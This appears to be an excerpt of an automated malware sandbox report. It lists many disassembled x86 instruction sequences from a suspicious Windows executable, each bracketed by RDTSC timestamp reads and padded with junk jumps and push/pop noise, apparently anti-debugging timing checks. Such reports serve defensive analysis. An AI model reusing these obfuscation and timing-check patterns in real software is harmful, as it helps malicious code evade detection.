Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C800E6 second address: 4C80152 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F97B4F2EDD4h 0x00000013 or esi, 0DE71328h 0x00000019 jmp 00007F97B4F2EDCBh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F97B4F2EDD8h 0x00000025 sub esi, 1C4B4588h 0x0000002b jmp 00007F97B4F2EDCBh 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, ebx 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C80152 second address: 4C801A3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F97B4EC49C0h 0x00000008 sub ecx, 5DF827E8h 0x0000000e jmp 00007F97B4EC49BBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov dx, ax 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007F97B4EC49C5h 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F97B4EC49BDh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C801A3 second address: 4C8020A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F97B4F2EDD7h 0x00000008 push eax 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebx, dword ptr [ebp+10h] 0x00000010 jmp 00007F97B4F2EDD2h 0x00000015 xchg eax, esi 0x00000016 jmp 00007F97B4F2EDD0h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov si, 5E13h 0x00000023 call 00007F97B4F2EDD8h 0x00000028 pop ecx 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C8020A second address: 4C802B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F97B4EC49C0h 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F97B4EC49BEh 0x00000019 and ch, 00000028h 0x0000001c jmp 00007F97B4EC49BBh 0x00000021 popfd 0x00000022 mov edx, esi 0x00000024 popad 0x00000025 xchg eax, edi 0x00000026 jmp 00007F97B4EC49C2h 0x0000002b push eax 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F97B4EC49C1h 0x00000033 and ch, FFFFFFF6h 0x00000036 jmp 00007F97B4EC49C1h 0x0000003b popfd 0x0000003c push eax 0x0000003d push edx 0x0000003e pushfd 0x0000003f jmp 00007F97B4EC49BEh 0x00000044 xor ch, 00000018h 0x00000047 jmp 00007F97B4EC49BBh 0x0000004c popfd 0x0000004d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C802B0 second address: 4C80341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, edi 0x0000000b pushad 0x0000000c mov edx, esi 0x0000000e mov bx, ax 0x00000011 popad 0x00000012 test esi, esi 0x00000014 jmp 00007F97B4F2EDD4h 0x00000019 je 00007F98271DD0F0h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F97B4F2EDCDh 0x00000028 sbb cx, FBC6h 0x0000002d jmp 00007F97B4F2EDD1h 0x00000032 popfd 0x00000033 pushfd 0x00000034 jmp 00007F97B4F2EDD0h 0x00000039 jmp 00007F97B4F2EDD5h 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C80341 second address: 4C8036C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F97B4EC49BDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C8036C second address: 4C803B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 pushfd 0x00000007 jmp 00007F97B4F2EDD3h 0x0000000c add esi, 5C363DBEh 0x00000012 jmp 00007F97B4F2EDD9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b je 00007F98271DD048h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C803B5 second address: 4C803B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C803B9 second address: 4C803BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C803BD second address: 4C803C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C803C3 second address: 4C803C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C803C9 second address: 4C803CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C803CD second address: 4C803D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C803D1 second address: 4C8043D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b pushad 0x0000000c mov eax, 5A97AC85h 0x00000011 movzx ecx, dx 0x00000014 popad 0x00000015 or edx, dword ptr [ebp+0Ch] 0x00000018 jmp 00007F97B4EC49BDh 0x0000001d test edx, 61000000h 0x00000023 jmp 00007F97B4EC49BEh 0x00000028 jne 00007F9827172C34h 0x0000002e jmp 00007F97B4EC49C0h 0x00000033 test byte ptr [esi+48h], 00000001h 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F97B4EC49C7h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C8043D second address: 4C80443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C80443 second address: 4C8045D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F9827172C0Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F97B4EC49BAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C7088C second address: 4C70892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70892 second address: 4C708F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F97B4EC49BDh 0x00000013 xor ax, 4AE6h 0x00000018 jmp 00007F97B4EC49C1h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F97B4EC49C0h 0x00000024 and si, A688h 0x00000029 jmp 00007F97B4EC49BBh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C708F0 second address: 4C70908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4F2EDD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70908 second address: 4C7090C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C7090C second address: 4C70944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F97B4F2EDCEh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F97B4F2EDD0h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F97B4F2EDCAh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70944 second address: 4C70948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70948 second address: 4C7094E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C7094E second address: 4C70971 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F97B4EC49BAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70971 second address: 4C70980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70980 second address: 4C709BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F97B4EC49C8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C709BA second address: 4C709C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C709C0 second address: 4C70A46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, si 0x00000006 mov di, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e mov edi, 58469C86h 0x00000013 jmp 00007F97B4EC49C7h 0x00000018 popad 0x00000019 xchg eax, ebx 0x0000001a jmp 00007F97B4EC49C6h 0x0000001f xchg eax, esi 0x00000020 pushad 0x00000021 pushad 0x00000022 jmp 00007F97B4EC49BCh 0x00000027 mov eax, 6546DF21h 0x0000002c popad 0x0000002d mov edi, eax 0x0000002f popad 0x00000030 push eax 0x00000031 jmp 00007F97B4EC49C3h 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F97B4EC49C5h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70A46 second address: 4C70AA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F97B4F2EDCCh 0x00000013 adc si, F978h 0x00000018 jmp 00007F97B4F2EDCBh 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007F97B4F2EDD6h 0x00000026 add esi, 60AD93D8h 0x0000002c jmp 00007F97B4F2EDCBh 0x00000031 popfd 0x00000032 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70AA8 second address: 4C70AB7 instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 sub ebx, ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov dl, 67h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70AB7 second address: 4C70ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70ABB second address: 4C70AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, esi 0x00000008 popad 0x00000009 test esi, esi 0x0000000b jmp 00007F97B4EC49C0h 0x00000010 je 00007F982717A26Eh 0x00000016 pushad 0x00000017 mov ecx, ebx 0x00000019 popad 0x0000001a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push ecx 0x00000025 pop ebx 0x00000026 mov ebx, ecx 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70AEF second address: 4C70AF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70AF5 second address: 4C70B1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F97B4EC49C5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70B1F second address: 4C70B2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4F2EDCCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70B2F second address: 4C70B33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70B33 second address: 4C70B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F98271E462Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movzx ecx, di 0x00000014 mov bx, 4C88h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70B4C second address: 4C70B5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4EC49BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70B5D second address: 4C70B82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [76FB6968h], 00000002h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push edi 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70B82 second address: 4C70B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70B87 second address: 4C70B8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70B8D second address: 4C70B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70B91 second address: 4C70BA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F98271E45E3h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70BA7 second address: 4C70BB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4EC49BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70BB8 second address: 4C70C02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e jmp 00007F97B4F2EDCEh 0x00000013 xchg eax, ebx 0x00000014 jmp 00007F97B4F2EDD0h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F97B4F2EDCEh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70C02 second address: 4C70C91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F97B4EC49C1h 0x00000009 and ecx, 7395A926h 0x0000000f jmp 00007F97B4EC49C1h 0x00000014 popfd 0x00000015 push ecx 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b jmp 00007F97B4EC49BAh 0x00000020 xchg eax, ebx 0x00000021 jmp 00007F97B4EC49C0h 0x00000026 push eax 0x00000027 pushad 0x00000028 mov ax, di 0x0000002b mov eax, edi 0x0000002d popad 0x0000002e xchg eax, ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 jmp 00007F97B4EC49C0h 0x00000037 pushfd 0x00000038 jmp 00007F97B4EC49C2h 0x0000003d and ax, 9F88h 0x00000042 jmp 00007F97B4EC49BBh 0x00000047 popfd 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70C91 second address: 4C70CCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+14h] 0x0000000c jmp 00007F97B4F2EDCEh 0x00000011 push dword ptr [ebp+10h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov bl, 8Fh 0x00000019 mov bx, cx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70D28 second address: 4C70D4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F97B4EC49BDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70D4D second address: 4C70D69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F97B4F2EDD7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C80D8D second address: 4C80D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C80D91 second address: 4C80D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C80B53 second address: 4C80BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F97B4EC49BFh 0x00000009 and ecx, 5C0E5A7Eh 0x0000000f jmp 00007F97B4EC49C9h 0x00000014 popfd 0x00000015 jmp 00007F97B4EC49C0h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F97B4EC49BDh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C80BAB second address: 4C80BB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF0F0E second address: 4CF0F54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F97B4EC49C9h 0x0000000c and cl, 00000006h 0x0000000f jmp 00007F97B4EC49C1h 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F97B4EC49BDh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF0F54 second address: 4CF0F74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, bl 0x00000005 mov dx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F97B4F2EDD1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF0474 second address: 4CF0537 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F97B4EC49BEh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F97B4EC49C1h 0x00000017 add esi, 149150D6h 0x0000001d jmp 00007F97B4EC49C1h 0x00000022 popfd 0x00000023 mov eax, 78023C47h 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a jmp 00007F97B4EC49BAh 0x0000002f mov ebp, esp 0x00000031 pushad 0x00000032 movzx esi, dx 0x00000035 mov eax, edi 0x00000037 popad 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007F97B4EC49BEh 0x00000042 xor ecx, 6CB3B158h 0x00000048 jmp 00007F97B4EC49BBh 0x0000004d popfd 0x0000004e pushfd 0x0000004f jmp 00007F97B4EC49C8h 0x00000054 sub ecx, 5A62BBB8h 0x0000005a jmp 00007F97B4EC49BBh 0x0000005f popfd 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF0537 second address: 4CF053D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF053D second address: 4CF0541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF02EE second address: 4CF0365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F97B4F2EDCFh 0x00000009 and ecx, 4113242Eh 0x0000000f jmp 00007F97B4F2EDD9h 0x00000014 popfd 0x00000015 movzx eax, bx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c jmp 00007F97B4F2EDCAh 0x00000021 xchg eax, ebp 0x00000022 jmp 00007F97B4F2EDD0h 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a call 00007F97B4F2EDCEh 0x0000002f pushad 0x00000030 popad 0x00000031 pop eax 0x00000032 mov edi, 501278B4h 0x00000037 popad 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c movzx eax, dx 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CF0365 second address: 4CF036B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C9016E second address: 4C901B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F97B4F2EDCAh 0x00000013 jmp 00007F97B4F2EDD5h 0x00000018 popfd 0x00000019 jmp 00007F97B4F2EDD0h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C901B9 second address: 4C901DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ecx, 4CA7900Bh 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C901DB second address: 4C901E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C901E1 second address: 4C901EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4EC49BAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C901EF second address: 4C901F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C901F3 second address: 4C90202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
